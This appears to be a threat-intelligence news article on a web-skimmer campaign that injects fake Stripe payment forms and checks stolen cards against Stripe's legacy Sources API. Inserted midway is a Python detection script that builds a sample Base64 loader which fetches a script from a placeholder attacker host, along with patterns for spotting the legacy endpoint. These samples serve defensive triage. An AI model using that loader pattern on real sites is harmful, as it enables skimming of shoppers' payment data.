Legacy Stripe API Exploited in Web Skimmer Campaign to Evaluate Stolen Payment Cards

April 3, 2025 | Ravie Lakshmanan | Cybersecurity / Threat Intelligence

Threat hunters have flagged a sophisticated web skimmer campaign that uses a legacy application programming interface (API) from Stripe to validate stolen payment information before it is exfiltrated.

“This tactic ensures that only legitimate card information is sent to the attackers,” Jscrambler researchers Pedro Fortuna, David Alves, and Pedro Marrucho said, making the operation more efficient and probably harder to detect.

According to estimates, 49 merchants have been affected by the campaign so far. The malicious script injections have been removed from fifteen of the affected websites. The activity is believed to have been ongoing since at least August 20, 2024.

Security firm Source Defense first reported details of the campaign toward the end of February 2025, describing the web skimmer’s use of the legacy “api.stripe[.]com/v1/sources” API, which allowed applications to accept various payment methods. That endpoint has since been replaced by the newer PaymentMethods API.

The browser skimmer, which uses malicious domains as its initial distribution point, is designed to intercept and hide the legitimate payment form on order checkout pages, present a replica of the genuine Stripe payment screen, validate the captured card details using the Sources API, and then transmit them to a remote server in Base64-encoded form.

According to Jscrambler, the threat actors behind the operation likely exploit vulnerabilities and misconfigurations in WooCommerce, WordPress, and PrestaShop to install the first-stage loader script. This loader decodes and executes a Base64-encoded next stage, which in turn contains the URL of the skimmer script.

The researchers said the skimming script “hides the genuine Stripe frame and overlays it with a malicious one designed to mimic its look.” The “Place Order” button is also cloned, hiding the real one.
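The loader-to-skimmer chain described above (a Base64-encoded next stage carrying the skimmer URL, and a skimmer that calls the legacy Sources endpoint) can be triaged from the defender's side by decoding long Base64 runs in page scripts and checking both the raw and decoded text for the legacy endpoint. The Python below is an added example, not code from the article or from Jscrambler; the sample scripts and every URL in them are constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Constructed samples modelled on the article's description. The second stage is
# Base64-encoded at runtime so the loader blob is guaranteed to decode cleanly.
SECOND_STAGE = ('var s=document.createElement("script");'
                's.src="https://skimmer.example/checkout.js";'  # placeholder URL
                'document.head.appendChild(s);')
LOADER_SCRIPT = 'eval(atob("%s"));' % base64.b64encode(SECOND_STAGE.encode()).decode()
# A script that talks to the legacy Sources endpoint the article names.
SKIMMER_SCRIPT = 'fetch("https://api.stripe.com/v1/sources",{method:"POST"});'
BENIGN_SCRIPT = 'document.getElementById("total").textContent = "42.00";'

B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')          # long Base64 runs only
URL_RE = re.compile(r'https?://[A-Za-z0-9.\-]+(?:/[^\s"\'<>]*)?')
LEGACY_SOURCES_RE = re.compile(r'api\.stripe\.com/v1/sources')


def decode_stages(script):
    """Return every long Base64 run in `script` that decodes to printable ASCII."""
    stages = []
    for blob in B64_RE.findall(script):
        padded = blob + "=" * (-len(blob) % 4)          # restore stripped padding
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue                                    # random-looking, not a stage
        if text.isprintable():
            stages.append(text)
    return stages


def analyse_script(script):
    """Flag decoded next stages, the URLs they load, and use of the legacy API."""
    stages = decode_stages(script)
    combined = script + "\n" + "\n".join(stages)        # raw and decoded text
    return {
        "decoded_stages": stages,
        "stage_urls": [u for s in stages for u in URL_RE.findall(s)],
        "legacy_sources_api": bool(LEGACY_SOURCES_RE.search(combined)),
    }


if __name__ == "__main__":
    for name, script in [("loader", LOADER_SCRIPT), ("skimmer", SKIMMER_SCRIPT),
                         ("benign", BENIGN_SCRIPT)]:
        print(name, analyse_script(script))
```

Run this over the inline and external scripts served on a checkout page; a hit on `stage_urls` or `legacy_sources_api` is a lead for review, not proof of compromise.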

Users are prompted to reload the page once their details have been entered. Because the script appears to be tailored to each targeted site, there is some evidence that the final skimmer payload was generated with some sort of tool.

The security firm added that it found skimmer scripts that appeared to target Square payment processing, which suggests the threat actors are actively targeting a number of payment service providers. The skimming code has also been reported to incorporate additional payment options using cryptocurrencies such as Bitcoin, Ether (Ethereum), Tether, and Litecoin.

The researchers said this sophisticated web skimming campaign highlights the evolving strategies attackers use to remain undetected. By validating card data before exfiltration, the attackers filter out invalid credit card details, ensuring that only usable card information is stolen.
